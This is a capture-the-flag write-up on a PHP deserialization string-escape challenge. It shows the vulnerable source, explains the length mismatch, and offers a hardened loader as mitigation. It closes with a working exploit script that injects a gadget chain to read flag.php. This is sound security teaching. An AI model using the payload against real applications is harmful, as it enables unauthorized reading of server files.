DASCTF_WEB1
Source
<?php
show_source("index.php");

function write($data) {
    return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

function read($data) {
    return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

class A {
    public $username;
    public $password;

    function __construct($a, $b) {
        $this->username = $a;
        $this->password = $b;
    }
}

class B {
    public $b = 'gqy';

    function __destruct() {
        $c = 'a' . $this->b;
        echo $c;
    }
}

class C {
    public $c;

    function __toString() {
        //flag.txt
        echo file_get_contents($this->c);
        return 'nice';
    }
}

$a = new A($_GET['a'], $_GET['b']);
// The step that stores the serialized data is omitted; below it is fetched back and unserialized
$b = unserialize(read(write(serialize($a))));
Reference: https://www.cnblogs.com/magic-zero/p/11643916.html
Analysis
function write($data) {
    return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

function read($data) {
    return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}
Because serialize() records each string's exact length, these two functions cause a string escape: the user can type the six-character literal '\0\0\0', which write() leaves alone, but read() shrinks each such group to the three bytes "\0*\0" after the s:N: length prefix has already been fixed, so the declared length overruns the shortened username and the parser continues into attacker-controlled bytes.
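An added example that is not part of the original writeup: it reuses the challenge's write()/read() pair and class A to make the length mismatch visible, and then shows a hardened loader (the function name safe_unserialize and the per-field filtering approach in the note below are my own, not the challenge's code) that rejects the escaped record instead of instantiating injected classes.

```php
<?php
// Added example, not from the writeup. Reproduces the challenge's filter pair
// to show where the length mismatch comes from, then shows two defensive
// checks for the loader: restricting unserialize() to the one expected class
// and a round-trip integrity test on the parsed object.

function write($data) {
    return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

function read($data) {
    return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

class A {
    public $username;
    public $password;

    function __construct($a, $b) {
        $this->username = $a;
        $this->password = $b;
    }
}

// 1. Root cause. The six-character literal '\0\0\0' is typed by the client,
//    serialize() counts those six characters in the s:N: prefix, write()
//    does nothing (there is no real NUL byte yet), and read() then collapses
//    each group to three bytes. The stored blob is 3 bytes shorter per group
//    than the length prefix claims.
$user = str_repeat('\0\0\0', 3);        // 18 characters as sent by a client
$blob = serialize(new A($user, 'pw'));
$back = read(write($blob));
printf("declared bytes: %d, bytes after read(): %d\n", strlen($blob), strlen($back));

// 2. Hardened loader (hypothetical name, not the challenge's code).
function safe_unserialize(string $stored): ?A {
    $raw = read($stored);

    // Only class A may be instantiated. Any injected object (B, C, ...) is
    // rebuilt as __PHP_Incomplete_Class, so no __destruct/__toString of a
    // gadget class ever runs. The @ silences the E_NOTICE on malformed input.
    $obj = @unserialize($raw, ['allowed_classes' => ['A']]);
    if (!($obj instanceof A)) {
        return null;                    // parse failure or unexpected type
    }

    // Round trip: a record that was not tampered with re-serializes to the
    // exact bytes just parsed. An escaped record leaves extra properties or
    // trailing data behind and fails this comparison.
    if (!hash_equals($raw, serialize($obj))) {
        return null;
    }
    return $obj;
}

// 3. A normal record passes; the writeup's escape payload is rejected.
$good = write(serialize(new A('alice', 'pw')));
var_dump(safe_unserialize($good) instanceof A);

$escapeUser = str_repeat('\0', 27);    // 54 characters, nine '\0\0\0' groups
$escapePass = 'AAAA";s:5:"h3zh1";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}';
$bad = write(serialize(new A($escapeUser, $escapePass)));
var_dump(safe_unserialize($bad));      // NULL: rejected before any gadget runs
```

The allowed_classes option exists since PHP 7.0 and is the single most effective mitigation here, because the escape only pays off if a class with a useful magic method can be instantiated. The deeper fix is to never rewrite a serialized blob at all: apply write()/read() to the individual field values before serialize() and after unserialize(), so every s:N: prefix is computed on the bytes that are actually stored.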
exp
<?php
class A {
    public $username;
    public $password;
}

class B {
    public $b = 'gqy';
}

class C {
    public $c = "flag.php";
}

$c = new C();
$b = new B();
$b->b = $c;   // B::__destruct concatenates $this->b, which calls C::__toString

// The 4 A's pad the 23 characters '";s:8:"password";s:73:"' to 27, so the
// injected property starts exactly where the shortened username ends.
$exp = 'AAAA";s:5:"h3zh1";' . serialize($b);

// 27 x '\0' = 54 characters in the serialized username; read() turns each
// six-character '\0\0\0' into three bytes, so the value loses 27 characters
// and the declared length of 54 runs on into the password field.
$aa = "\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0";

echo "a=" . $aa . "&b=" . $exp;